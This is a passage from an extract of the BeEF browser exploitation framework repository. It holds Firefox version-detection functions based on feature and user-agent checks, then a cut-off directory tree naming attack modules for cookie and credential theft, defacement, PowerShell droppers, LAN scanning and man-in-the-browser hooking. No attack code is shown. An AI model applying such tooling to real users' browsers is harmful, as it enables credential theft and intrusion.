return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
},
/**
* Returns true if FF16
* @example: beef.browser.isFF16()
*/
isFF16: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
},
/**
* Returns true if FF17
* @example: beef.browser.isFF17()
*/
isFF17: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
},
/**
* Returns true if FF18
* @example: beef.browser.isFF18()
*/
isFF18: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
},
/**
* Returns true if FF19
* @example: beef.browser.isFF19()
*/
isFF19: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
},
/**
* Returns true if FF20
* @example: beef.browser.isFF20()
*/
isFF20: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
},
/**
* Returns true if FF21
* @example: beef.browser.isFF21()
*/
isFF21: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/**
* Returns true if FF22
* @example: beef.browser.isFF22()
*/
isFF22: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
},
/**
* Returns true if FF23
* @example: beef.browser.isFF23()
*/
isFF23: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
},
/**
* Returns true if FF24
* @example: beef.browser.isFF24()
*/
isFF24: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
},
/**
* Returns true if FF25
* @example: beef.browser.isFF25()
*/
isFF25: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
},
/**
* Returns true if FF26
* @example: beef.browser.isFF26()
*/
isFF26: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
},
/**
* Returns true if FF27
* @example: beef.browser.isFF27()
*/
isFF27: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/27./) != null;
},
/**
* Returns true if FF28
* @example: beef.browser.isFF28()
*/
isFF28: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
},
/**
* Returns true if FF29
* @example: beef.browser.isFF29()
*/
isFF29: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
},
/**
* Returns true if FF30
* @example: beef.browser.isFF30()
*/
isFF30: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
},
/**
* Returns true if FF31
* @example: beef.browser.isFF31()
*/
isFF31: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
},
/**
* Returns true if FF32
* @example: beef.browser.isFF32()
*/
isFF32: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
},
/**
* Returns true if FF33
* @example: beef.browser.isFF33()
*/
isFF33: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
},
/**
* Returns true if FF34
* @example: beef.browser.isFF34()
*/
isFF34: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
},
/**
* Returns true if FF35
* @example: beef.browser.isFF35()
*/
isFF35: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
},
/**
* Returns true if FF36
* @example: beef.browser.isFF36()
*/
isFF36: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
},
/**
* Returns true if FF37
* @example: beef.browser.isFF37()
*/
isFF37: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
},
/**
* Returns true if FF38
* @example: beef.browser.isFF38()
*/
isFF38: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
},
/**
* Returns true if FF39
* @example: beef.browser.isFF39()
*/
isFF39: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
},
/**
* Retu
gitextract_7_kdzefs/ ├── .dockerignore ├── .github/ │ ├── CONTRIBUTING.md │ ├── ISSUE_TEMPLATE/ │ │ ├── bug_report.md │ │ └── config.yml │ ├── PULL_REQUEST_TEMPLATE.md │ ├── SECURITY.md │ ├── dependabot.yml │ └── workflows/ │ ├── codeql.yml │ ├── dependabot-auto-merge.yml │ ├── dependabot_auto_label.yml │ ├── github_actions.yml │ └── stale.yml ├── .rspec ├── .rubocop.yml ├── .ruby-gemset ├── .ruby-version ├── Dockerfile ├── Gemfile ├── INSTALL.txt ├── README.md ├── Rakefile ├── VERSION ├── _config.yml ├── arerules/ │ ├── alert.json │ ├── c_osx_test-return-mods.json │ ├── confirm_close_tab.json │ ├── enabled/ │ │ └── README │ ├── ff_osx_extension-dropper.json │ ├── get_cookie.json │ ├── ie_win_fakenotification-clippy.json │ ├── ie_win_htapowershell.json │ ├── ie_win_missingflash-prettytheft.json │ ├── ie_win_test-return-mods.json │ ├── lan_cors_scan.json │ ├── lan_cors_scan_common.json │ ├── lan_fingerprint.json │ ├── lan_fingerprint_common.json │ ├── lan_flash_scan.json │ ├── lan_flash_scan_common.json │ ├── lan_http_scan.json │ ├── lan_http_scan_common.json │ ├── lan_ping_sweep.json │ ├── lan_ping_sweep_common.json │ ├── lan_port_scan.json │ ├── lan_sw_port_scan.json │ ├── man_in_the_browser.json │ ├── raw_javascript.json │ ├── record_snapshots.json │ └── win_fake_malware.json ├── beef ├── beef_cert.pem ├── beef_key.pem ├── conf.json ├── config.yaml ├── core/ │ ├── api/ │ │ ├── extension.rb │ │ ├── extensions.rb │ │ ├── main/ │ │ │ ├── configuration.rb │ │ │ ├── migration.rb │ │ │ ├── network_stack/ │ │ │ │ └── assethandler.rb │ │ │ ├── server/ │ │ │ │ └── hook.rb │ │ │ └── server.rb │ │ ├── module.rb │ │ └── modules.rb │ ├── api.rb │ ├── bootstrap.rb │ ├── core.rb │ ├── extension.rb │ ├── extensions.rb │ ├── filters/ │ │ ├── base.rb │ │ ├── browser.rb │ │ ├── command.rb │ │ ├── http.rb │ │ └── page.rb │ ├── filters.rb │ ├── hbmanager.rb │ ├── loader.rb │ ├── logger.rb │ ├── main/ │ │ ├── ar-migrations/ │ │ │ ├── 001_create_command_modules.rb │ │ │ ├── 002_create_hooked_browsers.rb │ │ │ ├── 003_create_logs.rb │ │ │ ├── 004_create_commands.rb │ │ │ ├── 005_create_results.rb │ │ │ ├── 006_create_option_caches.rb │ │ │ ├── 007_create_browser_details.rb │ │ │ ├── 008_create_executions.rb │ │ │ ├── 009_create_rules.rb │ │ │ ├── 010_create_interceptor.rb │ │ │ ├── 011_create_web_cloner.rb │ │ │ ├── 013_create_network_host.rb │ │ │ ├── 014_create_network_service.rb │ │ │ ├── 015_create_http.rb │ │ │ ├── 016_create_rtc_status.rb │ │ │ ├── 017_create_rtc_manage.rb │ │ │ ├── 018_create_rtc_signal.rb │ │ │ ├── 019_create_rtc_module_status.rb │ │ │ ├── 020_create_xssrays_detail.rb │ │ │ ├── 021_create_dns_rule.rb │ │ │ ├── 024_create_autoloader.rb │ │ │ └── 025_create_xssrays_scan.rb │ │ ├── autorun_engine/ │ │ │ ├── engine.rb │ │ │ ├── parser.rb │ │ │ └── rule_loader.rb │ │ ├── client/ │ │ │ ├── are.js │ │ │ ├── beef.js │ │ │ ├── browser/ │ │ │ │ ├── cookie.js │ │ │ │ └── popup.js │ │ │ ├── browser.js │ │ │ ├── dom.js │ │ │ ├── encode/ │ │ │ │ ├── base64.js │ │ │ │ └── json.js │ │ │ ├── geolocation.js │ │ │ ├── hardware.js │ │ │ ├── init.js │ │ │ ├── lib/ │ │ │ │ ├── evercookie.js │ │ │ │ ├── jquery-migrate-1.4.1.js │ │ │ │ ├── jquery.blockUI.js │ │ │ │ ├── json2.js │ │ │ │ ├── mdetect.js │ │ │ │ ├── platform.js │ │ │ │ └── webrtcadapter.js │ │ │ ├── logger.js │ │ │ ├── mitb.js │ │ │ ├── net/ │ │ │ │ ├── connection.js │ │ │ │ ├── cors.js │ │ │ │ ├── dns.js │ │ │ │ ├── local.js │ │ │ │ ├── portscanner.js │ │ │ │ ├── requester.js │ │ │ │ └── xssrays.js │ │ │ ├── net.js │ │ │ ├── os.js │ │ │ ├── session.js │ │ │ ├── timeout.js │ │ │ ├── updater.js │ │ │ ├── webrtc.js │ │ │ └── websocket.js │ │ ├── command.rb │ │ ├── configuration.rb │ │ ├── console/ │ │ │ ├── banners.rb │ │ │ ├── beef.ascii │ │ │ └── commandline.rb │ │ ├── constants/ │ │ │ ├── browsers.rb │ │ │ ├── commandmodule.rb │ │ │ ├── hardware.rb │ │ │ └── os.rb │ │ ├── crypto.rb │ │ ├── geoip.rb │ │ ├── handlers/ │ │ │ ├── browserdetails.rb │ │ │ ├── commands.rb │ │ │ ├── hookedbrowsers.rb │ │ │ └── modules/ │ │ │ ├── beefjs.rb │ │ │ ├── command.rb │ │ │ ├── legacybeefjs.rb │ │ │ └── multistagebeefjs.rb │ │ ├── logger.rb │ │ ├── migration.rb │ │ ├── model.rb │ │ ├── models/ │ │ │ ├── browserdetails.rb │ │ │ ├── command.rb │ │ │ ├── commandmodule.rb │ │ │ ├── execution.rb │ │ │ ├── hookedbrowser.rb │ │ │ ├── legacybrowseruseragents.rb │ │ │ ├── log.rb │ │ │ ├── optioncache.rb │ │ │ ├── result.rb │ │ │ └── rule.rb │ │ ├── network_stack/ │ │ │ ├── api.rb │ │ │ ├── assethandler.rb │ │ │ ├── handlers/ │ │ │ │ ├── dynamicreconstruction.rb │ │ │ │ ├── raw.rb │ │ │ │ └── redirector.rb │ │ │ └── websocket/ │ │ │ └── websocket.rb │ │ ├── rest/ │ │ │ ├── api.rb │ │ │ └── handlers/ │ │ │ ├── admin.rb │ │ │ ├── autorun_engine.rb │ │ │ ├── browserdetails.rb │ │ │ ├── categories.rb │ │ │ ├── hookedbrowsers.rb │ │ │ ├── logs.rb │ │ │ ├── modules.rb │ │ │ └── server.rb │ │ ├── router/ │ │ │ ├── api.rb │ │ │ └── router.rb │ │ └── server.rb │ ├── module.rb │ ├── modules.rb │ ├── ruby/ │ │ ├── hash.rb │ │ ├── module.rb │ │ ├── print.rb │ │ ├── security.rb │ │ └── string.rb │ ├── ruby.rb │ └── settings.rb ├── doc/ │ ├── COPYING │ └── boilerplate ├── docs/ │ ├── BeefJS.html │ ├── are.js.html │ ├── beef.are.html │ ├── beef.browser.cookie.html │ ├── beef.browser.html │ ├── beef.browser.popup.html │ ├── beef.dom.html │ ├── beef.encode.base64.html │ ├── beef.encode.json.html │ ├── beef.geolocation.html │ ├── beef.hardware.html │ ├── beef.init.html │ ├── beef.js.html │ ├── beef.logger.html │ ├── beef.mitb.html │ ├── beef.net.connection.html │ ├── beef.net.cors.html │ ├── beef.net.dns.html │ ├── beef.net.html │ ├── beef.net.local.html │ ├── beef.net.portscanner.html │ ├── beef.net.requester.html │ ├── beef.net.xssrays.html │ ├── beef.os.html │ ├── beef.session.html │ ├── beef.timeout.html │ ├── beef.updater.html │ ├── beef.webrtc.html │ ├── beef.websocket.html │ ├── browser.js.html │ ├── browser_cookie.js.html │ ├── browser_jools.html │ ├── browser_popup.js.html │ ├── dom.js.html │ ├── encode_base64.js.html │ ├── encode_json.js.html │ ├── geolocation.js.html │ ├── global.html │ ├── hardware.js.html │ ├── index.html │ ├── init.js.html │ ├── lib_browser_jools.js.html │ ├── lib_deployJava.js.html │ ├── lib_platform.js.html │ ├── logger.js.html │ ├── mitb.js.html │ ├── net.js.html │ ├── net_connection.js.html │ ├── net_cors.js.html │ ├── net_dns.js.html │ ├── net_local.js.html │ ├── net_portscanner.js.html │ ├── net_requester.js.html │ ├── net_xssrays.js.html │ ├── os.js.html │ ├── platform.html │ ├── scripts/ │ │ ├── linenumber.js │ │ └── prettify/ │ │ ├── Apache-License-2.0.txt │ │ ├── lang-css.js │ │ └── prettify.js │ ├── session.js.html │ ├── styles/ │ │ ├── jsdoc-default.css │ │ ├── prettify-jsdoc.css │ │ └── prettify-tomorrow.css │ ├── timeout.js.html │ ├── updater.js.html │ ├── webrtc.js.html │ └── websocket.js.html ├── extensions/ │ ├── admin_ui/ │ │ ├── api/ │ │ │ └── handler.rb │ │ ├── classes/ │ │ │ ├── httpcontroller.rb │ │ │ └── session.rb │ │ ├── config.yaml │ │ ├── constants/ │ │ │ └── icons.rb │ │ ├── controllers/ │ │ │ ├── authentication/ │ │ │ │ ├── authentication.rb │ │ │ │ └── index.html │ │ │ ├── modules/ │ │ │ │ └── modules.rb │ │ │ └── panel/ │ │ │ ├── index.html │ │ │ └── panel.rb │ │ ├── extension.rb │ │ ├── handlers/ │ │ │ └── ui.rb │ │ └── media/ │ │ ├── css/ │ │ │ ├── base.css │ │ │ └── ext-all.css │ │ ├── images/ │ │ │ ├── default/ │ │ │ │ ├── form/ │ │ │ │ │ ├── clear-trigger.psd │ │ │ │ │ ├── date-trigger.psd │ │ │ │ │ ├── search-trigger.psd │ │ │ │ │ └── trigger.psd │ │ │ │ └── window/ │ │ │ │ ├── left-corners.psd │ │ │ │ ├── left-right.psd │ │ │ │ ├── right-corners.psd │ │ │ │ └── top-bottom.psd │ │ │ └── icons/ │ │ │ └── README │ │ └── javascript/ │ │ ├── esapi/ │ │ │ ├── Class.create.js │ │ │ └── jquery-encoder-0.1.0.js │ │ ├── ext-all.js │ │ ├── ext-base.js │ │ ├── ui/ │ │ │ ├── authentication.js │ │ │ ├── common/ │ │ │ │ └── beef_common.js │ │ │ └── panel/ │ │ │ ├── AutoRunModuleForm.js │ │ │ ├── AutoRunRuleForm.js │ │ │ ├── AutoRunTab.js │ │ │ ├── BrowserDetailsDataGrid.js │ │ │ ├── HooksTab.js │ │ │ ├── Logout.js │ │ │ ├── LogsDataGrid.js │ │ │ ├── MainPanel.js │ │ │ ├── ModuleSearching.js │ │ │ ├── PanelStatusBar.js │ │ │ ├── PanelViewer.js │ │ │ ├── WelcomeTab.js │ │ │ ├── ZombieDataGrid.js │ │ │ ├── ZombieTab.js │ │ │ ├── ZombieTabs.js │ │ │ ├── ZombiesMgr.js │ │ │ ├── common.js │ │ │ ├── tabs/ │ │ │ │ ├── ZombieTabCommands.js │ │ │ │ ├── ZombieTabDetails.js │ │ │ │ ├── ZombieTabLogs.js │ │ │ │ ├── ZombieTabNetwork.js │ │ │ │ ├── ZombieTabRTC.js │ │ │ │ ├── ZombieTabRider.js │ │ │ │ └── ZombieTabXssRays.js │ │ │ └── zombiesTreeList.js │ │ └── ux/ │ │ ├── PagingStore.js │ │ ├── StatusBar.js │ │ └── TabCloseMenu.js │ ├── autoloader/ │ │ ├── config.yaml │ │ ├── extension.rb │ │ └── model.rb │ ├── customhook/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── handler.rb │ │ └── html/ │ │ └── index.html │ ├── demos/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── handler.rb │ │ └── html/ │ │ ├── basic.html │ │ ├── butcher/ │ │ │ ├── butch.css │ │ │ └── index.html │ │ ├── clickjacking/ │ │ │ ├── clickjack_attack.html │ │ │ └── clickjack_victim.html │ │ ├── plain.html │ │ ├── report.html │ │ └── secret_page.html │ ├── dns/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── dns.rb │ │ ├── extension.rb │ │ ├── logger.rb │ │ ├── model.rb │ │ └── rest/ │ │ └── dns.rb │ ├── dns_rebinding/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── dns_rebinding.rb │ │ ├── extension.rb │ │ └── views/ │ │ └── index.html │ ├── etag/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── etag.rb │ │ └── extension.rb │ ├── evasion/ │ │ ├── config.yaml │ │ ├── evasion.rb │ │ ├── extension.rb │ │ └── obfuscation/ │ │ ├── base_64.rb │ │ ├── minify.rb │ │ ├── scramble.rb │ │ └── whitespace.rb │ ├── events/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ └── handler.rb │ ├── metasploit/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── module.rb │ │ ├── rest/ │ │ │ └── msf.rb │ │ └── rpcclient.rb │ ├── network/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── models/ │ │ │ ├── network_host.rb │ │ │ └── network_service.rb │ │ └── rest/ │ │ └── network.rb │ ├── notifications/ │ │ ├── channels/ │ │ │ ├── email.rb │ │ │ ├── ntfy.rb │ │ │ ├── pushover.rb │ │ │ └── slack_workspace.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ └── notifications.rb │ ├── proxy/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── proxy.rb │ │ └── rest/ │ │ └── proxy.rb │ ├── qrcode/ │ │ ├── config.yaml │ │ ├── extension.rb │ │ └── qrcode.rb │ ├── requester/ │ │ ├── api/ │ │ │ └── hook.rb │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── handler.rb │ │ ├── models/ │ │ │ └── http.rb │ │ └── rest/ │ │ └── requester.rb │ ├── s2c_dns_tunnel/ │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── dnsd.rb │ │ ├── extension.rb │ │ └── httpd.rb │ ├── social_engineering/ │ │ ├── config.yaml │ │ ├── droppers/ │ │ │ └── readme.txt │ │ ├── extension.rb │ │ ├── models/ │ │ │ ├── interceptor.rb │ │ │ └── web_cloner.rb │ │ ├── powershell/ │ │ │ └── bind_powershell.rb │ │ ├── rest/ │ │ │ └── socialengineering.rb │ │ └── web_cloner/ │ │ ├── cloned_pages/ │ │ │ └── readme.txt │ │ ├── interceptor.rb │ │ └── web_cloner.rb │ ├── webrtc/ │ │ ├── api/ │ │ │ └── hook.rb │ │ ├── api.rb │ │ ├── config.yaml │ │ ├── extension.rb │ │ ├── handlers.rb │ │ ├── models/ │ │ │ ├── rtcmanage.rb │ │ │ ├── rtcmodulestatus.rb │ │ │ ├── rtcsignal.rb │ │ │ └── rtcstatus.rb │ │ └── rest/ │ │ └── webrtc.rb │ └── xssrays/ │ ├── api/ │ │ └── scan.rb │ ├── api.rb │ ├── config.yaml │ ├── extension.rb │ ├── handler.rb │ ├── models/ │ │ ├── xssraysdetail.rb │ │ └── xssraysscan.rb │ └── rest/ │ └── xssrays.rb ├── googlef1d5ff5151333109.html ├── install ├── modules/ │ ├── browser/ │ │ ├── avant_steal_history/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── browser_fingerprinting/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_activex/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_evernote_clipper/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_extensions/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_firebug/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_foxit/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_lastpass/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_mime_types/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_office/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_popup_blocker/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_quicktime/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_realplayer/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_silverlight/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_simple_adblock/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_toolbars/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_unity/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_unsafe_activex/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_vlc/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── detect_wmp/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── fingerprint_browser/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── fingerprint2.js │ │ │ └── module.rb │ │ ├── get_visited_domains/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── get_visited_urls/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── hooked_origin/ │ │ │ ├── ajax_fingerprint/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── alert_dialog/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── apache_tomcat_examples_cookie_disclosure/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── cisco_asa_password_disclosure/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── clear_console/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── deface_web_page/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── deface_web_page_component/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── disable_developer_tools/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_autocomplete_creds/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_cookie/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_form_values/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_local_storage/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_page_html/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_page_html_iframe/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_page_links/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_session_storage/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── get_stored_credentials/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── link_rewrite/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── link_rewrite_click_events/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── link_rewrite_sslstrip/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── link_rewrite_tel/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── mobilesafari_address_spoofing/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── overflow_cookiejar/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── prompt_dialog/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── remove_stuck_iframes/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── replace_video/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── rickroll/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ ├── site_redirect/ │ │ │ │ ├── command.js │ │ │ │ ├── config.yaml │ │ │ │ └── module.rb │ │ │ └── site_redirect_iframe/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── play_sound/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── remove_hook_element/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── spyder_eye/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── unhook/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ └── module.rb │ │ ├── webcam_flash/ │ │ │ ├── command.js │ │ │ ├── config.yaml │ │ │ ├── dev/ │ │ │ │ ├── com/ │ │ │ │ │ ├── adobe/ │ │ │ │ │ │ └── images/ │ │ │ │ │ │ ├── BitString.as │ │ │ │ │ │ ├── JPGEncoder.as │ │ │ │ │ │ └── PNGEncoder.as │ │ │ │ │ └── foxarc/ │ │ │ │ │ └── util/ │ │ │ │ │ └── Base64.as │ │ │ │ └── takeit.fla │ │ │ ├── module.rb │ │ │ ├── swfobject.js │ │ │ └── takeit.swf │ │ ├── 